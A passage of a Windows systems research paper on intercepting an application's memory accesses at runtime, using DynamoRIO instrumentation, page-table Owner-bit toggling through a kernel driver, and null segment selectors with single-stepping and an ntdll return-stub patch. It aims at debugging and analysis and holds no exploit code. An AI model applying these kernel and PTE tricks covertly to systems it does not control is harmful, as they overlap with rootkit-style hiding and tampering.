many additional DBI frameworks and details, but for the sake of limiting scope
|
||||
these will not be discussed. The reader should consult reference material to
|
||||
learn more about this subject[11].
|
||||
|
||||
DynamoRIO is an example of a DBI framework that allows custom instrumentation
|
||||
code to be integrated in the form of dynamic libraries. The tool itself is a
|
||||
combination of Dynamo, a dynamic optimization engine developed by researchers
|
||||
at HP, and RIO, a runtime introspection and optimization engine developed by
|
||||
MIT. The fine-grained details of the implementation of DynamoRIO are outside
|
||||
of the scope of this paper, but it's important to understand the basic
|
||||
concepts[2].
|
||||
|
||||
At a high-level, figure 1 from Transparent Binary Optimization provides a
|
||||
great visualization of the process employed by Dynamo[2]. In concrete terms,
|
||||
Dynamo works by processing an instruction stream as it executes. To
|
||||
accomplish this, Dynamo assumes responsibility for the execution of the
|
||||
instruction stream. It uses a disassembler to identify the point of the next
|
||||
branch instruction in the code that is about to be executed. The set of
|
||||
instructions disassembled is referred to as a fragment (although, it's more
|
||||
commonly known as a basic block). If the target of the branch instruction is
|
||||
in Dynamo's fragment cache, it executes the (potentially optimized) code in
|
||||
the fragment cache. When this code completes, it returns control to Dynamo to
|
||||
disassemble the next fragment. If at some point Dynamo encounters a branch
|
||||
target that is not in its fragment cache, it will add it to the fragment cache
|
||||
and potentially optimize it. This is the perfect opportunity for
|
||||
instrumentation code to be injected into the optimized fragment that is
|
||||
generated for a branch target. Injecting instrumentation code at this level
|
||||
is entirely transparent to the application. While this is an
|
||||
oversimplification of the process used by DynamoRIO, it should at least give
|
||||
some insight into how it functions.
|
||||
|
||||
One of the best features of DynamoRIO from an analysis standpoint is that it
|
||||
provides a framework for inserting instrumentation code during the time that a
|
||||
fragment is being inserted into the fragment cache. This is especially useful
|
||||
for the purposes of intercepting memory accesses within an application. When
|
||||
a fragment is being created, DynamoRIO provides analysis libraries with the
|
||||
instructions that are to be included in the fragment that is generated. To
|
||||
optimize for performance, DynamoRIO provides multiple levels of disassembly
|
||||
information. At the most optimized level, only very basic information
|
||||
about the instructions is provided. At the least optimized level, very
|
||||
detailed information about the instructions and their operands can be
|
||||
obtained. Analysis libraries are free to control the level of information
|
||||
that they retrieve. Using this knowledge of DynamoRIO, it is now possible
|
||||
to consider how one might design an analysis library that is able to
|
||||
intercept memory reads and writes while an application is executing.
|
||||
|
||||
2.1.1) Design
|
||||
|
||||
DBI, and DynamoRIO in particular, make designing a solution that can intercept
|
||||
memory reads and writes fairly trivial. The basic design involves having an
|
||||
analysis library that scans the instructions within a fragment that is being
|
||||
created. When an instruction that accesses memory is encountered,
|
||||
instrumentation code can be inserted prior to the instruction. The
|
||||
instrumentation code can be composed of instructions that notify an
|
||||
instrumentation function of the memory operand that is about to be read from
|
||||
or written to. This has the effect of causing the instrumentation function to
|
||||
be called when the fragment is executed. These few steps are really all that
|
||||
it takes instrument the memory access behavior of an application as it
|
||||
executes using DynamoRIO.
|
||||
|
||||
2.1.2) Implementation
|
||||
|
||||
The implementation of the DBI approach is really just as easy as the design
|
||||
description makes it sound. To cooperate with DynamoRIO, an analysis library
|
||||
must implement a well-defined routine named dynamorio_basic_block which is
|
||||
called by DynamoRIO when a fragment is being created. This routine is passed
|
||||
an instruction list which contains the set of instructions taken from the
|
||||
native binary. Using this instruction list, the analysis library can make a
|
||||
determination as to whether or not any of the operands of an instruction
|
||||
either explicitly or implicitly reference memory. If an instruction does
|
||||
access memory, then instrumentation code must be inserted.
|
||||
|
||||
Inserting instrumentation code with DynamoRIO is a pretty painless process.
|
||||
DynamoRIO provides a number of macros that encapsulate the process of creating
|
||||
and inserting instructions into the instruction list. For example,
|
||||
INSTR_CREATE_add will create an add instruction with a specific set of arguments
|
||||
and instrlist_meta_preinsert will insert an instruction prior to another
|
||||
instruction within the instruction list.
|
||||
|
||||
A proof of concept implementation is included with the source code provided
|
||||
along with this paper.
|
||||
|
||||
2.1.3) Considerations
|
||||
|
||||
This approach is particularly elegant thanks to the concepts of dynamic binary
|
||||
instrumentation and to DynamoRIO itself for providing an elegant framework
|
||||
that supports inserting instrumentation code into the fragment cache. Since
|
||||
DynamoRIO is explicitly designed to be a runtime optimization engine, the fact
|
||||
that the instrumentation code is cached within the fragment cache means that
|
||||
it gains the benefits of DynamoRIO's fragment optimization algorithms. When
|
||||
compared to alternative approaches, this approach also has significantly less
|
||||
overhead once the fragment cache begins to become populated. This is because
|
||||
all of the instrumentation code is placed entirely inline with the application
|
||||
code that is executing rather than having to rely on alternative means of
|
||||
interrupting the normal course of program execution. Still, this approach is
|
||||
not without its set of considerations. Some of these considerations are
|
||||
described below:
|
||||
|
||||
1. Requires the use of a disassembler
|
||||
DynamoRIO depends on its own internal disassembler. This can be a source
|
||||
of problems and limitations.
|
||||
|
||||
2. Self-modifying and dynamic code
|
||||
Self-modifying and dynamically generated code can potentially cause problems
|
||||
with DynamoRIO.
|
||||
|
||||
3. DynamoRIO is closed source
|
||||
While this has nothing to do with the actual concept, the fact that
|
||||
DynamoRIO is closed source can be limiting in the event that there are
|
||||
issues with DynamoRIO itself.
|
||||
|
||||
2.2) Page Access Interception
|
||||
|
||||
The hardware paging features of the x86 and x64 architectures represent a
|
||||
potentially useful means of obtaining information about the memory access
|
||||
behavior of an application. This is especially true due to the well-defined
|
||||
actions that the processor takes when a reference is made to a linear address
|
||||
whose physical page is either not present or has had its access restricted.
|
||||
In these cases, the processor will assert the page fault interrupt (0x0E) and
|
||||
thereby force the operating system to attempt to gracefully handle the virtual
|
||||
memory reference. In Windows, the page fault interrupt is handled by
|
||||
nt!KiTrap0E. In most cases, nt!KiTrap0E will issue a call into
|
||||
nt!MmAccessFault which is responsible for making a determination about the
|
||||
nature of the memory reference that occurred. If the memory reference fault
|
||||
was a result of an access restriction, nt!MmAccessFault will return an access
|
||||
violation error code (0xC0000005). When an access violation occurs, an
|
||||
exception record is generated by the kernel and is then passed to either the
|
||||
user-mode exception dispatcher or the kernel-mode exception dispatcher
|
||||
depending on which mode the memory access occurred in. The job of the
|
||||
exception dispatcher is to give a thread an opportunity to gracefully recover
|
||||
from the exception. This is accomplished by providing each of the registered
|
||||
or vectored exception handlers with the exception information that was
|
||||
collected when the page fault occurred. If an exception handler is able to
|
||||
recover, execution of the thread can simply restart where it left off. Using
|
||||
the principles outlined above, it is possible to design a system that is
|
||||
capable of both trapping and handling memory references to specific pages in
|
||||
memory during the course of normal process execution.
|
||||
|
||||
2.2.1) Design
|
||||
|
||||
The first step that must be taken to implement this system involves
|
||||
identifying a method that can be used to trap references to arbitrary pages in
|
||||
memory. Fortunately, previous work has done much to identify some of the
|
||||
different approaches that can be taken to accomplish this[8, 4]. For the purposes
|
||||
of this paper, one of the most useful approaches centers around the ability to
|
||||
define whether or not a page is restricted from user-mode access. This is
|
||||
controlled by the Owner bit in a linear address' page table entry (PTE)[5]. When
|
||||
the Owner bit is set to 0, the page can only be accessed at privilege level 0.
|
||||
This effectively restricts access to kernel-mode in all modern operating
|
||||
systems. Likewise, when the Owner bit is set to 1, the page can be accessed
|
||||
from all privilege levels. By toggling the Owner bit to 0 in the PTEs
|
||||
associated with a given set of linear addresses, it is possible to trap all
|
||||
user-mode references to those addresses at runtime. This effectively solves
|
||||
the first hurdle in implementing a solution to intercept memory access
|
||||
behavior.
|
||||
|
||||
Using the approach outlined above, any reference that is made from user-mode
|
||||
to a linear address whose PTE has had the Owner bit set to 0 will result in an
|
||||
access violation exception being passed to the user-mode exception dispatcher.
|
||||
This exception must be handled by a custom exception handler that is able to
|
||||
distinguish transient access violations from ones that occurred as a result of
|
||||
the Owner bit having been modified. This custom exception handler must also
|
||||
be able to recover from the exception in a manner that allows execution to
|
||||
resume seamlessly. Distinguishing exceptions is easy if one assumes that the
|
||||
custom exception handler has knowledge in advance of the address regions that
|
||||
have had their Owner bit modified. Given this assumption, the act of
|
||||
distinguishing exceptions is as simple as seeing if the fault address is
|
||||
within an address region that is currently being monitored. While
|
||||
distinguishing exceptions may be easy, being able to gracefully recovery is an
|
||||
entirely different matter.
|
||||
|
||||
To recover and resume execution with no noticeable impact to an application
|
||||
means that the exception handler must have a mechanism that allows the
|
||||
application to access the data stored in the pages whose virtual mappings have
|
||||
had their access restricted to kernel-mode. This, of course, would imply that
|
||||
the application must have some way, either direct or indirect, to access the
|
||||
contents of the physical pages associated with the virtual mappings that have
|
||||
had their PTEs modified. The most obvious approach would be to simply toggle
|
||||
the Owner bit to permit user-mode access. This has many different problems,
|
||||
not the least of which being that doing so would be expensive and would not
|
||||
behave properly in multi-threaded environments (memory accesses could be
|
||||
missed or worse). An alternative to updating the Owner bit would be to have a
|
||||
device driver designed to provide support to processes that would allow them
|
||||
to read the contents of a virtual address at privilege level 0. However,
|
||||
having the ability to read and write memory through a driver means nothing if
|
||||
the results of the operation cannot be factored back into the instruction that
|
||||
triggered the exception.
|
||||
|
||||
Rather than attempting to emulate the read and write access, a better approach
|
||||
can be used. This approach involves creating a second virtual mapping to the
|
||||
same set of physical pages described by the linear addresses whose PTEs were
|
||||
modified. This second virtual mapping would behave like a typical user-mode
|
||||
memory mapping. In this way, the process' virtual address space would contain
|
||||
two virtual mappings to the same set of physical pages. One mapping, which
|
||||
will be referred to as the original mapping, would represent the user-mode
|
||||
inaccessible set of virtual addresses. The second mapping, which will be
|
||||
referred to as the mirrored mapping, would be the user-mode accessible set of
|
||||
virtual addresses. By mapping the same set of physical pages at two
|
||||
locations, it is possible to transparently redirect address references at the
|
||||
time that exceptions occur. An important thing to note is that in order to
|
||||
provide support for mirroring, a disassembler must be used to figure out which
|
||||
registers need to be modified.
|
||||
|
||||
To better understand how this could work, consider a scenario where an
|
||||
application contains a mov [eax], 0x1 instruction. For the purposes of this
|
||||
example, assume that the eax register contains an address that is within the
|
||||
original mapping as described above. When this instruction executes, it will
|
||||
lead to an access violation exception being generated as a result of the PTE
|
||||
modifications that were made to the original mapping. When the exception
|
||||
handler inspects this exception, it can determine that the fault address was
|
||||
one that is contained within the original mapping. To allow execution to
|
||||
resume, the exception handler must update the eax register to point to the
|
||||
equivalent address within the mirrored region. Once it has altered the value
|
||||
of eax, the exception handler can tell the exception dispatcher to continue
|
||||
execution with the now-modified register information. From the perspective of
|
||||
an executing application, this entire operation will occur transparently.
|
||||
Unfortunately, there's still more work that needs to be done in order to
|
||||
ensure that the application continues to execute properly after the exception
|
||||
dispatcher continues execution.
|
||||
|
||||
The biggest problem with modifying the value of a register to point to the
|
||||
mirrored address is that it can unintentionally alter the behavior of
|
||||
subsequent instructions. For example, the application may not function
|
||||
properly if it assumes that it can access other non-mirrored memory addresses
|
||||
relative to the address stored within eax. Not only that, but allowing eax to
|
||||
continue to be accessed through the mirrored address will mean that subsequent
|
||||
reads and writes to memory made using the eax register will be missed for the
|
||||
time that eax contains the mirrored address.
|
||||
|
||||
In order to solve this problem, it is necessary to come up with a method of
|
||||
restoring registers to their original value after the instruction executes.
|
||||
Fortunately, the underlying architecture has built-in support that allows a
|
||||
program to be notified after it has executed an instruction. This support is
|
||||
known as single-stepping. To make use of single-stepping, the exception
|
||||
handler can set the trap flag (0x100) in the saved value of the eflags
|
||||
register. When execution resumes, the processor will generate a single step
|
||||
exception after the original instruction executes. This will result in the
|
||||
custom exception handler being called. When this occurs, the custom exception
|
||||
handler can determine if the single step exception occurred as a result of a
|
||||
previous mirroring operation. If it was the result of a mirroring operation,
|
||||
the exception handler can take steps to restore the appropriate register to
|
||||
its original value.
|
||||
|
||||
Using these four primary steps, a complete solution to the problem of
|
||||
intercepting memory accesses can be formed. First, the Owner bit of the PTEs
|
||||
associated with a region of virtual memory can be set to 0. This will cause
|
||||
user-mode references to this region to generate an access violation exception.
|
||||
Second, an additional mapping to the set of physical pages described the
|
||||
original mapping can be created which is accessible from user-mode. Third,
|
||||
any access violation exceptions that reach the custom exception handler can be
|
||||
inspected. If they are the result of a reference to a region that is being
|
||||
tracked, the register contents of the thread context can be adjusted to
|
||||
reference the user-accessible mirrored mapping. The thread can then be
|
||||
single-stepped so that the fourth and final step can be taken. When a
|
||||
single-step exception is generated, the custom exception handler can restore
|
||||
the original value of the register that was modified. When this is complete,
|
||||
the thread can be allowed to continue as if nothing had happened.
|
||||
|
||||
2.2.2) Implementation
|
||||
|
||||
An implementation of this approach is included with the source code released
|
||||
along with this paper. This implementation has two main components: a
|
||||
kernel-mode driver and a user-mode DLL. The kernel-mode driver provides a
|
||||
device object interface that allows a user-mode process to create a mirrored
|
||||
mapping of a set of physical pages and to toggle the Owner bit of PTEs
|
||||
associated with address regions. The user-mode DLL is responsible for
|
||||
implementing a vectored exception handler that takes care of processing access
|
||||
violation exceptions by mirroring the address references to the appropriate
|
||||
mirrored region. The user-mode DLL also exposes an API that allows
|
||||
applications to create a memory mirror. This abstracts the entire process and
|
||||
makes it simple to begin tracking a specific memory region. The API also
|
||||
allows applications to register callbacks that are notified when an address
|
||||
reference occurs. This allows further analysis of the memory access behavior
|
||||
of the application.
|
||||
|
||||
2.2.3) Considerations
|
||||
|
||||
While this approach is most definitely functional, it comes with a number of
|
||||
caveats that make it sub-optimal for any sort of large-scale deployment. The
|
||||
following considerations are by no means all-encompassing, but some of the
|
||||
more important ones have been enumerated below:
|
||||
|
||||
1. Unsafe modification of PTEs
|
||||
It is not safe to modify PTEs without acquiring certain locks.
|
||||
Unfortunately, these locks are not exported and are therefore inaccessible
|
||||
to third party drivers.
|
||||
|
||||
2. Large amount of overhead
|
||||
The overhead associated with having to take a page fault and pass the
|
||||
exception on to the be handled by user-mode is substantial. Memory access
|
||||
time with respect to the application could jump from nanoseconds to micro
|
||||
or even milli seconds.
|
||||
|
||||
3. Requires the use of a disassembler
|
||||
Since this approach relies on mirroring memory references from one virtual
|
||||
address to another, a disassembler has to be used to figure out which
|
||||
registers need to be modified with the mirrored address. Any time a
|
||||
disassembler is needed is an indication that things are getting fairly
|
||||
complicated.
|
||||
|
||||
4. Cannot track memory references to all addresses
|
||||
The fact that this approach relies on locking physical pages prevents it
|
||||
from feasibly tracking all memory references. In addition, because the
|
||||
thread stack is required to be valid in order to dispatch exceptions, it's
|
||||
not possible to track reads and writes to thread stacks using this
|
||||
approach.
|
||||
|
||||
2.3) Null Segment Interception
|
||||
|
||||
Segmentation is an extremely old feature of the x86 architecture. Its purpose
|
||||
has been to provide software with the ability to partition the address space
|
||||
into distinct segments that can be referenced through a 16-bit segment
|
||||
selector. Segment selectors are used to index either the Global Descriptor
|
||||
Table (GDT) or the Local Descriptor Table (LDT). Segment descriptors convey
|
||||
information about all or a portion of the address space. On modern 32-bit
|
||||
operating systems, segmentation is used to set up a flat memory model
|
||||
(primarily only used because there is no way to disable it). This is further
|
||||
illustrated by the fact that the x64 architecture has effectively done away
|
||||
with the ES, DS, and SS segment registers in 64-bit mode. While segment
|
||||
selectors are primarily intended to make it possible to access memory, they
|
||||
can also be used to prevent access to it.
|
||||
|
||||
2.3.1) Design
|
||||
|
||||
Segmentation is one of the easiest ways to trap memory accesses. The majority
|
||||
of instructions which reference memory implicitly use either the DS or ES
|
||||
segment registers to do so. The one exception to this rule are instructions
|
||||
that deal with the stack. These instructions implicitly use the SS segment
|
||||
register. There are a few different ways one can go about causing a general
|
||||
protection fault when accessing an address relative to a segment selector, but
|
||||
one of the easiest is to take advantage of the null selector. The null
|
||||
selector, 0x0, is a special segment selector that will always cause a general
|
||||
protection fault when using it to reference memory. By loading the null
|
||||
selector into DS, for example, the mov [eax], 0x1 instruction would cause a
|
||||
general protection fault when executed. Using the null selector solves the
|
||||
problem of being able to intercept memory accesses, but there still needs to
|
||||
be some mechanism to allow the application to execute normally after
|
||||
intercepting the memory access.
|
||||
|
||||
When a general protection fault occurs in user-mode, the kernel generates an
|
||||
access violation exception and passes it off to the user-mode exception
|
||||
dispatcher in much the same way as was described in 2.2. Registering a custom
|
||||
exception handler makes it possible to catch this exception and handle it
|
||||
gracefully. To handle this exception, the custom exception handler must
|
||||
restore DS and ES segment registers to valid segment selectors by updating the
|
||||
thread context record associated with the exception. On 32-bit versions of
|
||||
Windows, the segment registers should be restored to 0x23. Once the the
|
||||
segment registers have been updated, the exception dispatcher can be told to
|
||||
continue execution. However, before this happens, there is an additional step
|
||||
that must be taken.
|
||||
|
||||
It is not enough to simply restore the segment registers and then continue
|
||||
execution. This would lead to subsequent reads and writes being missed as a
|
||||
result of the DS and ES segment registers no longer pointing to the null
|
||||
selector. To address this, the custom exception handler should toggle the
|
||||
trap flag in the context record prior to continuing execution. Setting the
|
||||
trap flag will cause the processor to generate a single step exception after
|
||||
the instruction that generated the general protection fault executes. This
|
||||
single step exception can then be processed by the custom exception handler to
|
||||
reset the DS and ES segment registers to the null selector. After the segment
|
||||
registers have been updated, the trap flag can be disabled and execution can
|
||||
be allowed to continue. By following these steps, the application is able to
|
||||
make forward progress while also making it possible to trap all memory reads
|
||||
and writes that use the DS and ES segment registers.
|
||||
|
||||
2.3.2) Implementation
|
||||
|
||||
The implementation for this approach involves registering a vectored exception
|
||||
handler that is able to handle the access violation and single step exceptions
|
||||
that are generated. Since this approach relies on setting the segment
|
||||
registers DS and ES to the null selector, an implementation must take steps to
|
||||
update the segment register state for each running thread in a process and for
|
||||
all new threads as they are created. Updating the segment register state for
|
||||
running threads involves enumerating running threads in the calling process
|
||||
using the toolhelp library. For each thread that is not the calling thread,
|
||||
the SetThreadContext routine can be used to update segment registers. The
|
||||
calling thread can update the segment registers using native instructions. To
|
||||
alter the segment registers for new threads, the DLLTHREADATTACH notification
|
||||
can be used. Once all threads have had their DS and ES segment registers
|
||||
updated, memory references will immediately begin causing access violation
|
||||
exceptions.
|
||||
|
||||
When these access violation exceptions are passed to the vectored exception
|
||||
handler, appropriate steps must be taken to restore the DS and ES segment
|
||||
registers to a valid segment selector, such as 0x23. This is accomplished by
|
||||
updating the SegDs and SegEs segment registers in the CONTEXT structure that
|
||||
is passed in association with an exception. In addition to updating these
|
||||
segment registers, the trap flag (0x100) must also be set in the EFlags
|
||||
register so that the DS and ES segment registers can be restored to the null
|
||||
selector in order to trap subsequent memory accesses. Setting the trap flag
|
||||
will lead to a single step exception after the instruction that generated the
|
||||
access violation executes. When the single step exception is received, the
|
||||
SegDs and SegEs segment registers can be restored to the null selector.
|
||||
|
||||
These few steps capture the majority of the implementation, but there is a
|
||||
specific Windows nuance that must be handled in order for this to work right.
|
||||
When the Windows kernel returns to a user-mode process after a system call has
|
||||
completed, it restores the DS and ES segment selectors to their normal value
|
||||
of 0x23. The problem with this is that without some way to reset the segment
|
||||
registers to the null selector after a system call returns, there is no way to
|
||||
continue to track memory accesses after a system call. Fortunately, there is
|
||||
a relatively painless way to reset the segment registers after a system call
|
||||
returns. On Windows XP SP2 and more recent versions of Windows, the kernel
|
||||
determines where to transfer control to after a system call returns by looking
|
||||
at the function pointer stored in the shared user data memory mapping.
|
||||
Specifically, the SystemCallReturn attribute at 0x7ffe0304 holds a pointer to
|
||||
a location in ntdll that typically contains just a ret instruction as shown
|
||||
below:
|
||||
|
||||
0:001> u poi(0x7ffe0304)
|
||||
ntdll!KiFastSystemCallRet:
|
||||
7c90eb94 c3 ret
|
||||
7c90eb95 8da42400000000 lea esp,[esp]
|
||||
7c90eb9c 8d642400 lea esp,[esp]
|
||||
|
||||
Replacing this single ret instruction with code that resets the DS and ES
|
||||
registers to the null selector followed by a ret instruction is enough to make
|
||||
it possible to continue to trap memory accesses after a system call returns.
|
||||
However, this replacement code should not take these steps if a system call
|
||||
occurs in the context of the exception dispatcher, as this could lead to a
|
||||
nesting issue if anything in the exception dispatcher references memory, which
|
||||
is very likely.
|
||||
|
||||
An implementation of this approach is included with the source code provided
|
||||
along with this paper.
|
||||
|
||||
2.3.3) Considerations
|
||||
|
||||
There are a few considerations that should be noted about this approach. On
|
||||
the positive side, this approach is unique when compared to the others
|
||||
described in this paper due to the fact that, in principle, it should be
|
||||
possible to use it to trap memory accesses in kernel-mode, although it is
|
||||
expected that the implementation may be much more complicated. This approach
|
||||
is also much simpler than the other approaches in that it requires far less
|
||||
code. While these are all good things, there are some negative considerations
|
||||
that should also be pointed out. These are enumerated below:
|
||||
|
||||
1. Will not work on x64
|
||||
The segmentation approach described in this section will not work on x64
|
||||
due to the fact that the DS, ES, and even SS segment selectors are
|
||||
effectively ignored when the processor is in 64-bit mode.
|
||||
|
||||
2. Significant performance overhead
|
||||
Like many of the other approaches, this one also suffers from significant
|
||||
performance overhead involved in having to take a GP and DB fault for
|
||||
every address reference. This approach could be be further optimized by
|
||||
creating a custom LDT entry (using NtSetLdtEntries) that describes a
|
||||
region whose base address is 0 and length is n where n is just below the
|
||||
address of the region(s) that should be monitored. This would have the
|
||||
effect of allowing memory accesses to succeed within the lower portion of
|
||||
the address space and fail in the higher portion (which is being
|
||||
monitored). It's important to note that the base address of the LDT entry
|
||||
must be zero. This is problematic since most of the regions that one
|
||||
would like to monitor (heap) are allocated low in the address space. It
|
||||
would be possible to work around this issue by having
|
||||
NtAllocateVirtualMemory allocate using MEM\_TOP\_DOWN.
|
||||
|
||||
3. Requires a disassembler
|
||||
Unfortunately, this approach also requires the use of a disassembler in
|
||||
order to extract the effective address that caused the access violation
|
||||
exception to occur. This is necessary because general protection faults
|
||||
that occur due to a segment selector issue generate exception records that
|
||||
flag the fault address as being 0xffffffff. This makes sense in the
|
||||
context that without a valid segment selector, there is no way to
|
||||
accurately calculate the effective address. The use of a disassembler
|
||||
means that the code is inherently more complicated than it would otherwise
|
||||
need to be. There may be some way to craft a special LDT entry that would
|
||||
still make it possible to determine the address that cause the fault, but
|
||||
the author has not investigated this.
|
||||
|
||||
3) Potential Uses
|
||||
|
||||
The ability to intercept an application's memory accesses is an interesting
|
||||
concept but without much use beyond simple statistical and visual analysis.
|
||||
Even though this is the case, the data that can be collected by analyzing
|
||||
memory access behavior can make it possible to perform much more extensive
|
||||
forms of dynamic binary analysis. This section will give a brief introduction
|
||||
to some of the hypothetical areas that might benefit from being able to
|
||||
understand the memory access behavior of an application.
|
||||
|
||||
3.1) Data Propagation
|
||||
|
||||
Being able to gain knowledge about the way that data propagates throughout an
|
||||
application can provide extremely useful insights. For example, understanding
|
||||
data propagation can give security researchers an idea of the areas of code
|
||||
that are affected, either directly or indirectly, by a buffer that is received
|
||||
from a network socket. In this context, having knowledge about areas affected
|
||||
by data would be much more valuable than simply understanding the code paths
|
||||
that are taken as a result of the buffer being received. Though the two may
|
||||
seem closely related, the areas of code affected by a buffer that is received
|
||||
should actually be restricted to a subset of the overall code paths taken.
|
||||
|
||||
Even if understanding data propagation within an application is beneficial, it
|
||||
may not be clear exactly how analyzing memory access behavior could make this
|
||||
possible. To understand how this might work, it's best to think of memory
|
||||
access in terms of its two basic operations: read and write. In the course of
|
||||
normal execution, any instruction that reads from a location in memory can be
|
||||
said to be dependent on the last instruction that wrote to that location.
|
||||
When an instruction writes to a location in memory, it can be said that any
|
||||
instructions that originally wrote to that location no longer have claim over
|
||||
it. Using these simple concepts, it is possible to build a dependency graph
|
||||
that shows how areas of code become dependent on one another in terms of a
|
||||
reader/writer relationship. This dependency graph would be dynamic and would
|
||||
change as a program executes just the same as the data propagation within an
|
||||
application would change.
|
||||
|
||||
At this point in time, the author has developed a very simple implementation
|
||||
based on the DBI strategy outlined in this paper. The current implementation
|
||||
is in need of further refinement, but it is capable of showing reader/writer
|
||||
relationships as the program executes. This area is ripe for future research.
|
||||
|
||||
3.2) Memory Access Isolation
|
||||
|
||||
From a visualization standpoint, it might be interesting to be able to show
|
||||
with what degrees of code-level isolation different regions of memory are
|
||||
accessed. For example, being able to show what areas of code touch individual
|
||||
heap allocations could provide interesting insight into the containment model
|
||||
of an application that is being analyzed. This type of analysis might be able
|
||||
to show how well designed the application is by inferring code quality based
|
||||
on the average number of areas of code that make direct reference to unique
|
||||
heap allocations. Since this concept is a bit abstract, it might make sense
|
||||
to discuss a more concrete example.
|
||||
|
||||
One example might involve an object-oriented C++ application that contains
|
||||
multiple classes such as Circle, Shape, Triangle, and so on. In the first
|
||||
design, the application allows classes to directly access the attributes of
|
||||
instances. In the second design, the application forces classes to reference
|
||||
attributes through public getters and setters. Using memory access behavior
|
||||
to identify code-level isolation, the first design might be seen as a poor
|
||||
design due to the fact that there will be many code locations where unique
|
||||
heap allocations (class instances) have the contents of their memory accessed
|
||||
directly. The second design, on the other hand, might be seen as a more
|
||||
robust design due to the fact that the unique heap allocations would be
|
||||
accessed by fewer places (the getters and setters).
|
||||
|
||||
It may actually be the case that there's no way to draw a meaningful
|
||||
conclusion by analyzing code-level isolation of memory accesses. One specific
|
||||
case that was raised to the author involved how the use of inlining or
|
||||
aggressive compiler optimizations might incorrectly indicate a poor design.
|
||||
Even though this is likely true, there may be some knowledge that can be
|
||||
obtained by researching this further. The author is not presently aware of an
|
||||
implementation of this concept but would love to be made aware if one exists.
|
||||
|
||||
3.3) Thread Data Consistency
|
||||
|
||||
Programmers familiar with the pains of thread deadlocks and thread-related
|
||||
memory corruption should be well aware of how tedious these problems can be to
|
||||
debug. By analyzing memory access behavior in conjunction with some
|
||||
additional variables, it may be possible to make determinations as to whether
|
||||
or not a memory operation is being made in a thread safe manner. At this
|
||||
point, the author has not defined a formal approach that could be taken to
|
||||
achieve this, but a few rough ideas have been identified.
|
||||
|
||||
The basic idea behind this approach would be to combine memory access behavior
|
||||
with information about the thread that the access occurred in and the set of
|
||||
locks that were acquired when the memory access occurred. Determining which
|
||||
locks are held can be as simple as inserting instrumentation code into the
|
||||
routines that are used to acquire and release locks at runtime. When a lock
|
||||
is acquired, it can be pushed onto a thread-specific stack. When the lock is
|
||||
released, it can be removed. The nice thing about representing locks as a
|
||||
stack is that in almost every situation, locks should be acquired and released
|
||||
in symmetric order. Acquiring and releasing locks asymmetrically can quickly
|
||||
lead to deadlocks and therefore can be flagged as problematic.
|
||||
|
||||
Determining data consistency is quite a bit trickier, however. An analysis
|
||||
library would need some means of historically tracking read and write access
|
||||
to different locations in memory. Still, determining what might be a data
|
||||
consistency issue from this historical data is challenging. One example of a
|
||||
potential data consistency issue might be if two writes occur to a location in
|
||||
memory from separate threads without a common lock being acquired between the
|
||||
two threads. This isn't guaranteed to be problematic, but it is at the very
|
||||
least be indicative of a potential problem. Indeed, it's likely that many
|
||||
other types of data consistency examples exist that may be possible to capture
|
||||
in relation to memory access, thread context, and lock ownership.
|
||||
|
||||
Even if this concept can be made to work, the very fact that it would be a
|
||||
runtime solution isn't a great thing. It may be the case that code paths that
|
||||
lead to thread deadlocks or thread-related corruption are only executed rarely
|
||||
and are hard to coax out. Regardless, the author feels like this represents
|
||||
an interesting area of future research.
|
||||
|
||||
4) Previous Work
|
||||
|
||||
The ideas described in this paper benefit greatly from the concepts
|
||||
demonstrated in previous works. The memory mirroring concept described in 2.2
|
||||
draws heavily from the PaX team's work relating to their VMA mirroring and
|
||||
software-based non-executable page implementations[8]. Oded Horovitz provided an
|
||||
implementation of the paging approach for Windows and applied it to
|
||||
application security[4]. In addition, there have been other examples that use
|
||||
concepts similar to those described by PaX to achieve additional results, such
|
||||
as OllyBone, ShadowWalker, and others[10, 9]. The use of DBI in 2.1 for
|
||||
memory analysis is facilitated by the excellent work that has gone into
|
||||
DynamoRIO, Valgrind, and indeed all other DBI frameworks[3, 11].
|
||||
|
||||
It should be noted that if one is strictly interested in monitoring writes to
|
||||
a memory region, Windows provides a built-in feature known as a write watch.
|
||||
When allocating a region with VirtualAlloc, the MEM_WRITE_WATCH flag can be set.
|
||||
This flag tells the kernel to track writes that occur to the region. These
|
||||
writes can be queried at a later point in time using GetWriteWatch[6].
|
||||
|
||||
It is also possible to use guard pages and other forms of page protection,
|
||||
such as PAGE_NOACCESS, to intercept memory access to a page in user-mode.
|
||||
Pedram Amini's PyDbg supports the concept of memory breakpoints which are
|
||||
implemented using guard pages[12]. This type of approach has two limitations
|
||||
that are worth noting. The first limitation involves an inability to pass
|
||||
addresses to kernel-mode that have had a memory breakpoint set on them (either
|
||||
guard page or PAGE_NOACCESS). If this occurs it can lead to unexpected
|
||||
behavior, such as by causing a system call to fail when referencing the
|
||||
user-mode address. This would not trigger an exception in user-mode.
|
||||
Instead, the system call would simply return STATUS_ACCESS_VIOLATION. As a
|
||||
result, an application might crash or otherwise behave improperly. The second
|
||||
limitation is that there may be consequences in multi-threaded environments
|
||||
where memory accesses are missed.
|
||||
|
||||
5) Conclusion
|
||||
|
||||
The ability to analyze the memory access behavior of an application at runtime
|
||||
can provide additional insight into how an application works. This insight
|
||||
might include learning more about how data propagates, deducing the code-level
|
||||
isolation of memory references, identifying potential thread safety issues,
|
||||
and so on. This paper has described three strategies that can be used to
|
||||
intercept memory accesses within an application at runtime.
|
||||
|
||||
The first approach relies on Dynamic Binary Instruction (DBI) to inject
|
||||
instrumentation code before instructions that access memory locations. This
|
||||
instrumentation code is then capable of obtaining information about the
|
||||
address being referenced when instructions are executed.
|
||||
|
||||
The second approach relies on hardware paging features supported by the x86
|
||||
and x64 architecture to intercept memory accesses. This works by restricting
|
||||
access to a virtual address range to kernel-mode access. When an application
|
||||
attempts to reference a virtual address that has been marked as such, an
|
||||
exception is generated that is then passed to the user-mode exception
|
||||
dispatcher. A custom exception handler can then inspect the exception and
|
||||
take the steps necessary to allow execution to continue gracefully after
|
||||
having tracked the memory access.
|
||||
|
||||
The third approach uses the segmentation feature of the x86 architecture to
|
||||
intercept memory accesses. It does this by loading the DS and ES segment
|
||||
registers with the null selector. This has the effect of causing instructions
|
||||
which implicitly use these registers to generate a general protection fault
|
||||
when referencing memory. This fault results in an access violation exception
|
||||
being generated that can be handled in much the same way as the hardware
|
||||
paging approach.
|
||||
|
||||
It is hoped that these strategies might be useful to future research which
|
||||
could benefit from collecting memory access information.
|
||||
|
||||
References
|
||||
|
||||
[1] AMD. AMD64 Architecture Programmer's Manual: Volume 2 System Programming.
|
||||
